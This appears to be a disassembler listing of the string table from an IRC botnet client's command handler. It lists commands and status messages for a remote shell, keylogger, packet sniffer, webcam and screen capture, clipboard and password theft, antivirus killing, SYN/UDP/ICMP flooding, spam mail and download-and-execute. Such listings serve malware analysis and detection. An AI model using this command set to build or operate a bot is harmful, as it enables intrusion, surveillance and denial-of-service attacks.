aMainAliasList_ db '[MAIN]: Alias list.',0 ; DATA XREF: sub_409806+5090�o
aLogFailedToSta db '[LOG]: Failed to start listing thread, error: <%d>.',0
; DATA XREF: sub_409806+5060�o
aLogListingLog_ db '[LOG]: Listing log.',0 ; DATA XREF: sub_409806+5005�o
aMainNetworkInf db '[MAIN]: Network Info.',0 ; DATA XREF: sub_409806+4F5E�o
align 4
aMainSystemInfo db '[MAIN]: System Info.',0 ; DATA XREF: sub_409806+4F2E�o
align 4
aMainRemovingBo db '[MAIN]: Removing Bot.',0 ; DATA XREF: sub_409806+4EDA�o
align 4
aProcsFailedToS db '[PROCS]: Failed to start listing thread, error: <%d>.',0
; DATA XREF: sub_409806+4E64�o
align 4
aProcsProccessL db '[PROCS]: Proccess list.',0 ; DATA XREF: sub_409806+4E03�o
aFull db 'full',0 ; DATA XREF: sub_409806+4DE7�o
align 4
aProcAlreadyRun db '[PROC]: Already running.',0 ; DATA XREF: sub_409806+4D81�o
align 4
aMainUptimeS_ db '[MAIN]: Uptime: %s.',0 ; DATA XREF: sub_409806+4D2D�o
aCmdRemoteShe_0 db '[CMD]: Remote shell ready.',0 ; DATA XREF: sub_409806:loc_40E4A5�o
align 4
aCmdCouldnTOpen db '[CMD]: Couldn',27h,'t open remote shell.',0
; DATA XREF: sub_409806+4C95�o
align 4
aCmdRemoteShell db '[CMD]: Remote shell already running.',0 ; DATA XREF: sub_409806+4C76�o
align 4
aMainGetClipboa db '[MAIN]: Get Clipboard.',0 ; DATA XREF: sub_409806+4C60�o
align 4
aClipboardData db '-[Clipboard Data]-',0 ; DATA XREF: sub_409806+4C31�o
align 10h
aFlushdnsFail_1 db '[FLUSHDNS]: Failed to flush ARP cache.',0
; DATA XREF: sub_409806:loc_40E425�o
align 4
aFlushdnsArpC_0 db '[FLUSHDNS]: ARP cache flushed.',0 ; DATA XREF: sub_409806+4C0A�o
align 4
aFlushdnsFail_0 db '[FLUSHDNS]: Failed to load dnsapi.dll.',0
; DATA XREF: sub_409806:loc_40E3F4�o
align 10h
aFlushdnsFailed db '[FLUSHDNS]: Failed to flush DNS cache.',0
; DATA XREF: sub_409806:loc_40E3ED�o
align 4
aFlushdnsDnsCac db '[FLUSHDNS]: DNS cache flushed.',0 ; DATA XREF: sub_409806+4BE0�o
align 4
aRlogindFailedT db '[RLOGIND]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_409806+4B72�o
align 10h
aRlogindServerL db '[RLOGIND]: Server listening on IP: %s:%d, Username: %s.',0
; DATA XREF: sub_409806+4B19�o
aHttpdFailedT_1 db '[HTTPD]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_409806+4A39�o
align 10h
aTftpFailedTo_0 db '[TFTP]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_409806+48AF�o
aTftpAlreadyRun db '[TFTP]: Already running.',0 ; DATA XREF: sub_409806+4792�o
align 10h
aFindpassFail_0 db '[FINDPASS]: Failed to start search thread, error: <%d>.',0
; DATA XREF: sub_409806+4764�o
aFindpassSearch db '[FINDPASS]: Searching for password.',0 ; DATA XREF: sub_409806+4701�o
aScanFailedTo_1 db '[SCAN]: Failed to start scan, port is invalid.',0
; DATA XREF: sub_409806+46C6�o
; sub_409806+5DB3�o
align 10h
aScanSPortScanS db '[SCAN]: %s Port Scan started on %s:%d with a delay of %d seconds '
; DATA XREF: sub_409806+45FE�o
; sub_409806+5FE9�o
db 'for %d minutes using %d threads.',0
align 4
aSequential db 'Sequential',0 ; DATA XREF: sub_409806+45D3�o
; sub_409806+5FBE�o
align 10h
aRandom db 'Random',0 ; DATA XREF: sub_409806+45CC�o
; sub_409806+5FB7�o
align 4
aScanAlreadyDSc db '[SCAN]: Already %d scanning threads. Too many specified.',0
; DATA XREF: sub_409806+43EF�o
; sub_409806+5C9A�o
align 4
aMainNickChange db '[MAIN]: Nick changed to: ',27h,'%s',27h,'.',0
; DATA XREF: sub_409806+438B�o
align 4
aMainJoinedCh_0 db '[MAIN]: Joined channel: ',27h,'%s',27h,'.',0
; DATA XREF: sub_409806+436E�o
align 4
aMainPartedChan db '[MAIN]: Parted channel: ',27h,'%s',27h,'.',0
; DATA XREF: sub_409806+434D�o
align 4
aMainIrcRawS_ db '[MAIN]: IRC Raw: %s.',0 ; DATA XREF: sub_409806+4333�o
align 4
aThreadsFailedT db '[THREADS]: Failed to kill thread: %s.',0
; DATA XREF: sub_409806:loc_40DAC0�o
align 4
aThreadsKilledT db '[THREADS]: Killed thread: %s.',0 ; DATA XREF: sub_409806+42B3�o
align 4
aThreadsNoActiv db '[THREADS]: No active threads found.',0
; DATA XREF: sub_409806:loc_40DA74�o
aThreadsStopped db '[THREADS]: Stopped: %d thread(s).',0 ; DATA XREF: sub_409806+4264�o
align 4
aAll db 'all',0 ; DATA XREF: sub_409806+424E�o
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_409806+41C1�o
; sub_409806:loc_40EA32�o
align 10h
aMainPrefixChan db '[MAIN]: Prefix changed to: ',27h,'%c',27h,'.',0
; DATA XREF: sub_409806+4140�o
align 4
aShellCouldnTOp db '[SHELL]: Couldn',27h,'t open file: %s',0
; DATA XREF: sub_409806:loc_40D92D�o
aShellFileOpene db '[SHELL]: File opened: %s',0 ; DATA XREF: sub_409806+411D�o
align 10h
aMainServerChan db '[MAIN]: Server changed to: ',27h,'%s',27h,'.',0
; DATA XREF: sub_409806+40E8�o
align 4
aDnsCouldnTReso db '[DNS]: Couldn',27h,'t resolve hostname.',0
; DATA XREF: sub_409806:loc_40D8CE�o
align 4
aDnsLookupSS_ db '[DNS]: Lookup: %s -> %s.',0 ; DATA XREF: sub_409806+409D�o
align 4
aProcFailedTo_0 db '[PROC]: Failed to terminate process: %s',0
; DATA XREF: sub_409806:loc_40D86F�o
aProcProcessK_1 db '[PROC]: Process killed: %s',0 ; DATA XREF: sub_409806+4062�o
align 4
aProcProcessK_0 db '[PROC]: Process killed & deleted: %s',0 ; DATA XREF: sub_409806+401A�o
align 10h
aProcFailedToTe db '[PROC]: Failed to terminate process ID: %s',0
; DATA XREF: sub_409806:loc_40D7C1�o
align 4
aProcProcessKil db '[PROC]: Process killed ID: %s',0 ; DATA XREF: sub_409806+3FB4�o
align 4
aFileDeletedS_0 db '[FILE]: Deleted ',27h,'%s',27h,'.',0 ; DATA XREF: sub_409806+3F69�o
align 4
aFileListS db '[FILE]: List: %s',0 ; DATA XREF: sub_409806+3F44�o
align 4
aVisitFailedToS db '[VISIT]: Failed to start connection thread, error: <%d>.',0
; DATA XREF: sub_409806+3F00�o
align 4
aVisitUrlS_ db '[VISIT]: URL: %s.',0 ; DATA XREF: sub_409806+3EA7�o
align 4
aMircCommandSen db '[mIRC]: Command sent.',0 ; DATA XREF: sub_409806:loc_40D600�o
align 10h
aMircClientNotO db '[mIRC]: Client not open.',0 ; DATA XREF: sub_409806+3DF3�o
align 4
aCmdCommandsS db '[CMD]: Commands: %s',0 ; DATA XREF: sub_409806+3DB3�o
aCmdErrorSendin db '[CMD]: Error sending to remote shell.',0 ; DATA XREF: sub_409806+3DAB�o
align 4
aMainReadFileFa db '[MAIN]: Read file failed: %s',0 ; DATA XREF: sub_409806+3D5D�o
align 4
aMainReadFileCo db '[MAIN]: Read file complete: %s',0 ; DATA XREF: sub_409806+3D47�o
align 4
aCaptureInval_0 db '[CAPTURE]: Invalid parameters for amateur video capture.',0
; DATA XREF: sub_409806:loc_40D4D2�o
align 4
aCaptureError_1 db '[CAPTURE]: Error while capturing amateur video from webcam.',0
; DATA XREF: sub_409806:loc_40D4C8�o
aCaptureAmateur db '[CAPTURE]: Amateur video saved to: %s.',0 ; DATA XREF: sub_409806+3CAF�o
align 4
aVideo db 'video',0 ; DATA XREF: sub_409806+3C24�o
align 10h
aCaptureInvalid db '[CAPTURE]: Invalid parameters for webcam capture.',0
; DATA XREF: sub_409806:loc_40D412�o
align 4
aCaptureError_0 db '[CAPTURE]: Error while capturing from webcam.',0
; DATA XREF: sub_409806:loc_40D40B�o
align 4
aCaptureWebcamC db '[CAPTURE]: Webcam capture saved to: %s.',0 ; DATA XREF: sub_409806+3BF5�o
aFrame db 'frame',0 ; DATA XREF: sub_409806+3B88�o
align 4
aCaptureDriverL db '[CAPTURE]: Driver list complete.',0 ; DATA XREF: sub_409806+3B76�o
align 4
aCaptureDriverD db '[CAPTURE]: Driver #%d - %s - %s.',0 ; DATA XREF: sub_409806+3B42�o
align 4
aDrivers db 'drivers',0 ; DATA XREF: sub_409806+3AFB�o
aCaptureNoFilen db '[CAPTURE]: No filename specified for screen capture.',0
; DATA XREF: sub_409806:loc_40D2E9�o
align 4
aCaptureErrorWh db '[CAPTURE]: Error while capturing screen.',0
; DATA XREF: sub_409806:loc_40D2E2�o
align 4
aCaptureScreenC db '[CAPTURE]: Screen capture saved to: %s.',0 ; DATA XREF: sub_409806+3ACC�o
aScreen db 'screen',0 ; DATA XREF: sub_409806+3AA2�o
align 4
aMainGethostS_ db '[MAIN]: Gethost: %s.',0 ; DATA XREF: sub_409806+3A85�o
align 10h
aMainUnableToEx db '[MAIN]: Unable to extract Gethost command.',0
; DATA XREF: sub_409806:loc_40D247�o
align 4
aMainGethostSCo db '[MAIN]: Gethost: %s, Command: %s',0 ; DATA XREF: sub_409806+3A2B�o
align 10h
aMainAliasAdded db '[MAIN]: Alias added: %s.',0 ; DATA XREF: sub_409806+3976�o
align 4
aMainPrivmsgSS_ db '[MAIN]: Privmsg: %s: %s.',0 ; DATA XREF: sub_409806+3933�o
align 4
aMainActionSS_ db '[MAIN]: Action: %s: %s.',0 ; DATA XREF: sub_409806+38C8�o
aMainCycle_ db '[MAIN]: Cycle.',0 ; DATA XREF: sub_409806+3848�o
align 10h
aPartS db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_409806+380C�o
; sub_409806+433D�o
align 4
aMainModeChange db '[MAIN]: Mode change: %s',0 ; DATA XREF: sub_409806+37E7�o
aModeS_0 db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_409806+37D9�o
align 10h
aCloneRawSS db '[CLONE]: Raw (%s): %s',0 ; DATA XREF: sub_409806+37AD�o
align 4
aCloneModeSS db '[CLONE]: Mode (%s): %s',0 ; DATA XREF: sub_409806+373E�o
align 10h
aModeS db 'MODE %s',0 ; DATA XREF: sub_409806+36E6�o
aCloneNickSS db '[CLONE]: Nick (%s): %s',0 ; DATA XREF: sub_409806+36B3�o
align 10h
aNickS db 'NICK %s',0 ; DATA XREF: sub_409806+365A�o
; sub_409806+4188�o
aJoinSS db 'JOIN %s %s',0 ; DATA XREF: sub_409806+3639�o
align 4
aS_5 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_409806+3605�o
; sub_409806+3692�o ...
align 4
aPartS_0 db 'PART %s',0 ; DATA XREF: sub_409806+35CC�o
aMainRepeatNotA db '[MAIN]: Repeat not allowed in command line: %s',0
; DATA XREF: sub_409806:loc_40CDBF�o
align 4
aMainRepeatS db '[MAIN]: Repeat: %s',0 ; DATA XREF: sub_409806+357E�o
align 4
aMainDelay_ db '[MAIN]: Delay.',0 ; DATA XREF: sub_409806:loc_40CCF1�o
align 4
aSSSS db '%s %s %s :%s',0 ; DATA XREF: sub_409806+34A7�o
; sub_409806+3558�o ...
align 4
aUpdateFailedTo db '[UPDATE]: Failed to start download thread, error: <%d>.',0
; DATA XREF: sub_409806+341E�o
aUpdateDownload db '[UPDATE]: Downloading update from: %s.',0 ; DATA XREF: sub_409806+33BF�o
align 4
aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_409806+3318�o
align 4
aExecCommandsS db '[EXEC]: Commands: %s',0 ; DATA XREF: sub_409806+3294�o
align 4
aExecCouldnTExe db '[EXEC]: Couldn',27h,'t execute file.',0 ; DATA XREF: sub_409806+3281�o
align 4
aFindfileFailed db '[FINDFILE]: Failed to start search thread, error: <%d>.',0
; DATA XREF: sub_409806+31CD�o
aFindfileSear_0 db '[FINDFILE]: Searching for file: %s in: %s.',0
; DATA XREF: sub_409806+3169�o
align 10h
aFile_0 db '[FILE]:',0 ; DATA XREF: sub_409806:loc_40C8CD�o
; sub_409806:loc_40D776�o
aFileRenameSToS db '[FILE]: Rename: ',27h,'%s',27h,' to: ',27h,'%s',27h,'.',0
; DATA XREF: sub_409806+30AF�o
align 4
aIcmpInvalidFlo db '[ICMP]: Invalid flood time must be greater than 0.',0
; DATA XREF: sub_409806+3066�o
align 4
aIcmpFailedToSt db '[ICMP]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_409806+303E�o
align 10h
aIcmpFloodingSF db '[ICMP]: Flooding: (%s) for %s seconds.',0 ; DATA XREF: sub_409806+2FCE�o
align 4
aClonesFailedTo db '[CLONES]: Failed to start clone thread, error: <%d>.',0
; DATA XREF: sub_409806+2F42�o
align 10h
aClonesCreatedO db '[CLONES]: Created on %s:%d, in channel %s.',0
; DATA XREF: sub_409806+2EDF�o
align 4
aDdosFailedToSt db '[DDoS]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_409806+2E2F�o
align 10h
aDdosFloodingSS db '[DDoS]: Flooding: (%s:%s) for %s seconds.',0
; DATA XREF: sub_409806+2DC5�o
align 4
aSynFailedToSta db '[SYN]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_409806+2D31�o
align 10h
aSynFloodingSSF db '[SYN]: Flooding: (%s:%s) for %s seconds.',0
; DATA XREF: sub_409806+2CC7�o
align 4
aDownloadFailed db '[DOWNLOAD]: Failed to start transfer thread, error: <%d>.',0
; DATA XREF: sub_409806+2C1F�o
align 4
aDownloadDown_1 db '[DOWNLOAD]: Downloading URL: %s to: %s.',0 ; DATA XREF: sub_409806+2BC0�o
aRedirectFailed db '[REDIRECT]: Failed to start redirection thread, error: <%d>.',0
; DATA XREF: sub_409806+2AA2�o
align 10h
aRedirectTcpRed db '[REDIRECT]: TCP redirect created from: %s:%d to: %s:%d.',0
; DATA XREF: sub_409806+2A47�o
aScanFailedTo_0 db '[SCAN]: Failed to start scan thread, error: <%d>.',0
; DATA XREF: sub_409806+29A5�o
; sub_409806+465D�o ...
align 4
aScanPortScanSt db '[SCAN]: Port scan started: %s:%d with delay: %d(ms).',0
; DATA XREF: sub_409806+294A�o
align 4
aSSS_1 db '[%s] <%s> %s',0 ; DATA XREF: sub_409806+28C4�o
align 4
aSSS_2 db '[%s] * %s %s',0 ; DATA XREF: sub_409806+27A9�o
align 4
dword_429D54 dd 54434101h, 204E4F49h, 17325h ; sub_409806+38A3�o
dword_429D60 dd 615F63h aC_action db 'c_action',0 ; DATA XREF: sub_409806+2684�o
align 10h
aC_pm db 'c_pm',0 ; DATA XREF: sub_409806+2670�o
align 4
aC_privmsg db 'c_privmsg',0 ; DATA XREF: sub_409806+265C�o
align 4
aSc db 'sc',0 ; DATA XREF: sub_409806+2648�o
align 4
aScan db 'scan',0 ; DATA XREF: sub_409806+2634�o
align 10h
aRd db 'rd',0 ; DATA XREF: sub_409806+2620�o
align 4
aRedirect db 'redirect',0 ; DATA XREF: sub_409806+260C�o
align 10h
aDl db 'dl',0 ; DATA XREF: sub_409806+25F8�o
align 4
aDownload db 'download',0 ; DATA XREF: sub_409806+25E4�o
align 10h
aSyn db 'syn',0 ; DATA XREF: sub_409806+25D0�o
; sub_409806+5851�o ...
aSynflood db 'synflood',0 ; DATA XREF: sub_409806+25BC�o
align 10h
aC: ; DATA XREF: sub_409806+256C�o
; sub_415E96+73�o
unicode 0, <c>,0
aClone_0 db 'clone',0 ; DATA XREF: sub_409806+2558�o
align 4
aIcmp db 'icmp',0 ; DATA XREF: sub_409806+2532�o
align 4
aIcmpflood db 'icmpflood',0 ; DATA XREF: sub_409806+251E�o
align 10h
aMv db 'mv',0 ; DATA XREF: sub_409806+250A�o
align 4
aRename db 'rename',0 ; DATA XREF: sub_409806+24F6�o
align 4
aFf db 'ff',0 ; DATA XREF: sub_409806+24E2�o
align 10h
aFindfile db 'findfile',0 ; DATA XREF: sub_409806+24CE�o
align 4
aE: ; DATA XREF: sub_409806+24BA�o
unicode 0, <e>,0
aExecute db 'execute',0 ; DATA XREF: sub_409806+24A6�o
aUpdate db 'update',0 ; DATA XREF: sub_409806+247E�o
align 10h
aDe db 'de',0 ; DATA XREF: sub_409806+246A�o
align 4
aDelay db 'delay',0 ; DATA XREF: sub_409806+2456�o
align 4
aRp db 'rp',0 ; DATA XREF: sub_409806+2442�o
align 10h
aRepeat db 'repeat',0 ; DATA XREF: sub_409806+242E�o
; sub_409806+3536�o
align 4
aC_p db 'c_p',0 ; DATA XREF: sub_409806+241A�o
aC_part db 'c_part',0 ; DATA XREF: sub_409806+2406�o
align 4
aC_j db 'c_j',0 ; DATA XREF: sub_409806+23F2�o
aC_join db 'c_join',0 ; DATA XREF: sub_409806+23DE�o
align 10h
aC_n db 'c_n',0 ; DATA XREF: sub_409806+23CA�o
aC_nick db 'c_nick',0 ; DATA XREF: sub_409806+23B6�o
align 4
aC_m db 'c_m',0 ; DATA XREF: sub_409806+23A2�o
aC_mode db 'c_mode',0 ; DATA XREF: sub_409806+238E�o
align 4
aC_r db 'c_r',0 ; DATA XREF: sub_409806+237A�o
aC_raw db 'c_raw',0 ; DATA XREF: sub_409806+2366�o
align 4
aM: ; DATA XREF: sub_409806+2352�o
unicode 0, <m>,0
aMode db 'mode',0 ; DATA XREF: sub_409806+233E�o
align 10h
aCy db 'cy',0 ; DATA XREF: sub_409806+232A�o
align 4
aCycle db 'cycle',0 ; DATA XREF: sub_409806+2316�o
align 4
aA_1: ; DATA XREF: sub_409806+2302�o
unicode 0, <a>,0
aAction db 'action',0 ; DATA XREF: sub_409806+22EE�o
align 4
aPm_0 db 'pm',0 ; DATA XREF: sub_409806+22DA�o
align 4
aPrivmsg_0 db 'privmsg',0 ; DATA XREF: sub_409806+22C6�o
aAa db 'aa',0 ; DATA XREF: sub_409806+22B2�o
align 4
aAddalias db 'addalias',0 ; DATA XREF: sub_409806+229E�o
align 4
aAvfwFailedToSt db '[AVFW]: Failed to start AV/FW killer thread, error: <%d>.',0
; DATA XREF: sub_409806+2220�o
align 10h
aAvfw db '[AVFW]',0 ; DATA XREF: sub_409806+21C6�o
; sub_409806+227E�o
align 4
aKillerThread db 'Killer Thread',0 ; DATA XREF: sub_409806+21C1�o
; sub_409806+2279�o
align 4
aAvfwAvFwBotKil db '[AVFW]: AV/FW/BOT Killer active.',0 ; DATA XREF: sub_409806+21AB�o
align 4
aAvfwkiller db 'avfwkiller',0 ; DATA XREF: sub_409806+2180�o
align 4
aGh db 'gh',0 ; DATA XREF: sub_409806+216C�o
align 4
aGethost db 'gethost',0 ; DATA XREF: sub_409806+2158�o
aCap db 'cap',0 ; DATA XREF: sub_409806+2144�o
aCapture db 'capture',0 ; DATA XREF: sub_409806+2130�o
aNetCommandUnkn db '[NET]: Command unknown.',0 ; DATA XREF: sub_409806:loc_40B90E�o
aNetNoMessageSp db '[NET]: No message specified.',0 ; DATA XREF: sub_409806:loc_40B907�o
align 4
aNetUserListFai db '[NET]: User list failed.',0 ; DATA XREF: sub_409806:loc_40B8C0�o
align 4
aNetUserListCom db '[NET]: User list completed.',0 ; DATA XREF: sub_409806+20B3�o
aNetShareListFa db '[NET]: Share list failed.',0 ; DATA XREF: sub_409806:loc_40B821�o
align 4
aNetShareListCo db '[NET]: Share list completed.',0 ; DATA XREF: sub_409806+2011�o
align 4
aShare db 'share',0 ; DATA XREF: sub_409806+1FA5�o
align 4
aContinue db 'continue',0 ; DATA XREF: sub_409806+1F71�o
align 10h
aPause db 'pause',0 ; DATA XREF: sub_409806+1F5A�o
align 4
aStop db 'stop',0 ; DATA XREF: sub_409806+1F43�o
; sub_409806+2260�o
align 10h
aNetServiceLi_0 db '[NET]: Service list failed.',0 ; DATA XREF: sub_409806:loc_40B73B�o
aNetServiceList db '[NET]: Service list completed.',0 ; DATA XREF: sub_409806+1F2B�o
align 4
aStart db 'start',0 ; DATA XREF: sub_409806+1ED8�o
; sub_409806+2195�o
align 4
aNetFailedToLoa db '[NET]: Failed to load advapi32.dll or netapi32.dll.',0
; DATA XREF: sub_409806+1E9E�o
aNet db 'net',0 ; DATA XREF: sub_409806+1E7C�o
aKeylogFailedTo db '[KEYLOG]: Failed to start logging thread, error: <%d>.',0
; DATA XREF: sub_409806+1E59�o
align 4
aKeylogKeyLog_0 db '[KEYLOG]: Key logger active.',0 ; DATA XREF: sub_409806+1DFE�o
align 4
aKeylogAlreadyR db '[KEYLOG]: Already running.',0 ; DATA XREF: sub_409806+1D7D�o
align 10h
aKeylogNoKeyLog db '[KEYLOG]: No key logger thread found.',0
; DATA XREF: sub_409806:loc_40B55F�o
align 4
aKeylogKeyLogge db '[KEYLOG]: Key logger stopped. (%d thread(s) stopped.)',0
; DATA XREF: sub_409806+1D4F�o
align 10h
aFile db 'file',0 ; DATA XREF: sub_409806+1D1F�o
; sub_409806+1D9B�o
align 4
aKeylog db 'keylog',0 ; DATA XREF: sub_409806+1CF9�o
align 10h
aPsniffNoCarniv db '[PSNIFF]: No Carnivore thread found.',0
; DATA XREF: sub_409806:loc_40B4F4�o
align 4
aPsniffCarniv_0 db '[PSNIFF]: Carnivore stopped. (%d thread(s) stopped.)',0
; DATA XREF: sub_409806+1CE4�o
align 10h
aOff db 'off',0 ; DATA XREF: sub_409806+1CC5�o
; sub_409806+1D30�o
aPsniffFailedTo db '[PSNIFF]: Failed to start sniffer thread, error: <%d>.',0
; DATA XREF: sub_409806+1CB6�o
align 4
aPsniffCarnivor db '[PSNIFF]: Carnivore packet sniffer active.',0
; DATA XREF: sub_409806+1C39�o
align 4
aPsniffAlreadyR db '[PSNIFF]: Already running.',0 ; DATA XREF: sub_409806+1BD2�o
align 4
aOn db 'on',0 ; DATA XREF: sub_409806+1BB6�o
; sub_409806+1D0E�o
align 4
aPsniff db 'psniff',0 ; DATA XREF: sub_409806+1BA1�o
align 10h
aRf db 'rf',0 ; DATA XREF: sub_409806+1B8D�o
align 4
aReadfile db 'readfile',0 ; DATA XREF: sub_409806+1B79�o
align 10h
aCm db 'cm',0 ; DATA XREF: sub_409806+1B65�o
align 4
aCmd db 'cmd',0 ; DATA XREF: sub_409806+1B51�o
aMirc db 'mirc',0 ; DATA XREF: sub_409806+1B3D�o
align 10h
aMirccmd db 'mirccmd',0 ; DATA XREF: sub_409806+1B29�o
aV: ; DATA XREF: sub_409806+1B15�o
unicode 0, <v>,0
aVisit db 'visit',0 ; DATA XREF: sub_409806+1B01�o
align 4
aLi db 'li',0 ; DATA XREF: sub_409806+1AED�o
align 4
aList_0 db 'list',0 ; DATA XREF: sub_409806+1AD9�o
align 10h
aDel db 'del',0 ; DATA XREF: sub_409806+1AC5�o
aDelete db 'delete',0 ; DATA XREF: sub_409806+1AB1�o
; sub_409806+1F8B�o
align 4
aKi db 'ki',0 ; DATA XREF: sub_409806+1A9D�o
align 10h
aKill db 'kill',0 ; DATA XREF: sub_409806+1A89�o
align 4
aKdp db 'kdp',0 ; DATA XREF: sub_409806+1A75�o
aKilldelproc db 'killdelproc',0 ; DATA XREF: sub_409806+1A61�o
aKp db 'kp',0 ; DATA XREF: sub_409806+1A4D�o
align 4
aKillproc db 'killproc',0 ; DATA XREF: sub_409806+1A39�o
align 4
aDn db 'dn',0 ; DATA XREF: sub_409806+1A25�o
align 4
aDns db 'dns',0 ; DATA XREF: sub_409806+1A11�o
aSe db 'se',0 ; DATA XREF: sub_409806+19FD�o
align 4
aO: ; DATA XREF: sub_409806+19D5�o
unicode 0, <o>,0
aOpen db 'open',0 ; DATA XREF: sub_409806+19C1�o
; sub_409806+4104�o ...
align 10h
aPr db 'pr',0 ; DATA XREF: sub_409806+19AD�o
align 4
aPrefix db 'prefix',0 ; DATA XREF: sub_409806+1999�o
align 4
aC_rn db 'c_rn',0 ; DATA XREF: sub_409806+1985�o
align 4
aC_rndnick db 'c_rndnick',0 ; DATA XREF: sub_409806+1971�o
align 10h
aC_q db 'c_q',0 ; DATA XREF: sub_409806+195D�o
aC_quit db 'c_quit',0 ; DATA XREF: sub_409806+1949�o
align 4
aK: ; DATA XREF: sub_409806+1935�o
unicode 0, <k>,0
aKillthread db 'killthread',0 ; DATA XREF: sub_409806+1921�o
align 4
aRaw db 'raw',0 ; DATA XREF: sub_409806+18F9�o
aPt db 'pt',0 ; DATA XREF: sub_409806+18E5�o
align 4
aPart_0 db 'part',0 ; DATA XREF: sub_409806+18D1�o
align 4
aJ: ; DATA XREF: sub_409806+18BD�o
unicode 0, <j>,0
aJoin db 'join',0 ; DATA XREF: sub_409806+18A9�o
align 4
aN: ; DATA XREF: sub_409806+1895�o
unicode 0, <n>,0
aNick_0 db 'nick',0 ; DATA XREF: sub_409806+1881�o
align 4
aScanall db 'scanall',0 ; DATA XREF: sub_409806+1847�o
aFp db 'fp',0 ; DATA XREF: sub_409806+1833�o
align 10h
aFindpass db 'findpass',0 ; DATA XREF: sub_409806+181F�o
align 4
aTftp db 'tftp',0 ; DATA XREF: sub_409806+180B�o
align 4
aTftpserver db 'tftpserver',0 ; DATA XREF: sub_409806+17F7�o
align 10h
aHttp db 'http',0 ; DATA XREF: sub_409806+17E3�o
align 4
aHttpserver db 'httpserver',0 ; DATA XREF: sub_409806+17CF�o
align 4
aRlogin db 'rlogin',0 ; DATA XREF: sub_409806+17BB�o
align 4
aRloginserver db 'rloginserver',0 ; DATA XREF: sub_409806+17A7�o
align 4
aCip db 'cip',0 ; DATA XREF: sub_409806+1793�o
aCurrentip db 'currentip',0 ; DATA XREF: sub_409806+177F�o
align 4
aFdns db 'fdns',0 ; DATA XREF: sub_409806+176B�o
align 4
aFlushdns db 'flushdns',0 ; DATA XREF: sub_409806+1757�o
align 10h
aFarp db 'farp',0 ; DATA XREF: sub_409806+1743�o
align 4
aFlusharp db 'flusharp',0 ; DATA XREF: sub_409806+172F�o
align 4
aGc db 'gc',0 ; DATA XREF: sub_409806+171B�o
align 4
aGetclip db 'getclip',0 ; DATA XREF: sub_409806+1707�o
aEmailMessageSe db '[EMAIL]: Message sent to %s.',0 ; DATA XREF: sub_409806+16BD�o
align 10h
aHeloRndnickMai db 'helo $rndnick',0Ah ; DATA XREF: sub_409806+163C�o
db 'mail from: <%s>',0Ah
db 'rcpt to: <%s>',0Ah
db 'data',0Ah
db 'subject: %s',0Ah
db 'from: %s',0Ah
db '%s',0Ah
db '.',0Ah,0
a_: ; DATA XREF: sub_409806+159C�o
unicode 0, <_>,0
aEmail db 'email',0 ; DATA XREF: sub_409806+1531�o
align 4
aTcp db 'tcp',0 ; DATA XREF: sub_409806+151D�o
aTcpflood db 'tcpflood',0 ; DATA XREF: sub_409806+1509�o
align 4
aP: ; DATA XREF: sub_409806+14F5�o
unicode 0, <p>,0
aPing_0 db 'ping',0 ; DATA XREF: sub_409806+14E1�o
align 4
aPingflood db 'pingflood',0 ; DATA XREF: sub_409806+14CD�o
align 10h
aU: ; DATA XREF: sub_409806+14B9�o
unicode 0, <u>,0
aUdp db 'udp',0 ; DATA XREF: sub_409806+14A5�o
aUdpflood db 'udpflood',0 ; DATA XREF: sub_409806+1491�o
align 4
aAsc db 'asc',0 ; DATA XREF: sub_409806+147D�o
aAdvscan db 'advscan',0 ; DATA XREF: sub_409806+1469�o
aMainLoginListC db '[MAIN]: Login list complete.',0 ; DATA XREF: sub_409806+1445�o
align 10h
aD_S db '%d. %s',0 ; DATA XREF: sub_409806+1411�o
; sub_413721+46�o
align 4
aEmpty db '<Empty>',0 ; DATA XREF: sub_409806+1404�o
aLoginList db '-[Login List]-',0 ; DATA XREF: sub_409806+13E1�o
align 10h
aWho db 'who',0 ; DATA XREF: sub_409806+13C8�o
aCmd_0 db '[CMD]',0 ; DATA XREF: sub_409806+13BA�o
align 4
aRemoteShell db 'Remote shell',0 ; DATA XREF: sub_409806+13B5�o
align 4
aCmdstop db 'cmdstop',0 ; DATA XREF: sub_409806+13A0�o
aOcmd db 'ocmd',0 ; DATA XREF: sub_409806+138C�o
align 4
aOpencmd db 'opencmd',0 ; DATA XREF: sub_409806+1378�o
aDll db 'dll',0 ; DATA XREF: sub_409806+1364�o
aTestdlls db 'testdlls',0 ; DATA XREF: sub_409806+1350�o
align 4
aDrv db 'drv',0 ; DATA XREF: sub_409806+133C�o
aDriveinfo db 'driveinfo',0 ; DATA XREF: sub_409806+1328�o
align 4
aUp db 'up',0 ; DATA XREF: sub_409806+1314�o
; sub_409806+2492�o
align 4
aUptime db 'uptime',0 ; DATA XREF: sub_409806+1300�o
align 10h
aPs db 'ps',0 ; DATA XREF: sub_409806+12EC�o
align 4
aProcs db 'procs',0 ; DATA XREF: sub_409806+12D8�o
align 4
aErradicate db 'erradicate',0 ; DATA XREF: sub_409806+12C4�o
align 4
aDestroy db 'destroy',0 ; DATA XREF: sub_409806+12B0�o
aSi db 'si',0 ; DATA XREF: sub_409806+129C�o
align 4
aSysinfo db 'sysinfo',0 ; DATA XREF: sub_409806+1288�o
aNi db 'ni',0 ; DATA XREF: sub_409806+1274�o
align 10h
aNetinfo db 'netinfo',0 ; DATA XREF: sub_409806+1260�o
aClg db 'clg',0 ; DATA XREF: sub_409806+124C�o
aClearlog db 'clearlog',0 ; DATA XREF: sub_409806+1238�o
align 4
aLg db 'lg',0 ; DATA XREF: sub_409806+1224�o
align 4
aLog_0 db 'log',0 ; DATA XREF: sub_409806+1210�o
aAl db 'al',0 ; DATA XREF: sub_409806+11FC�o
align 4
aAliases db 'aliases',0 ; DATA XREF: sub_409806+11E8�o
aT: ; DATA XREF: sub_409806+11D4�o
unicode 0, <t>,0
aThreads db 'threads',0 ; DATA XREF: sub_409806+11C0�o
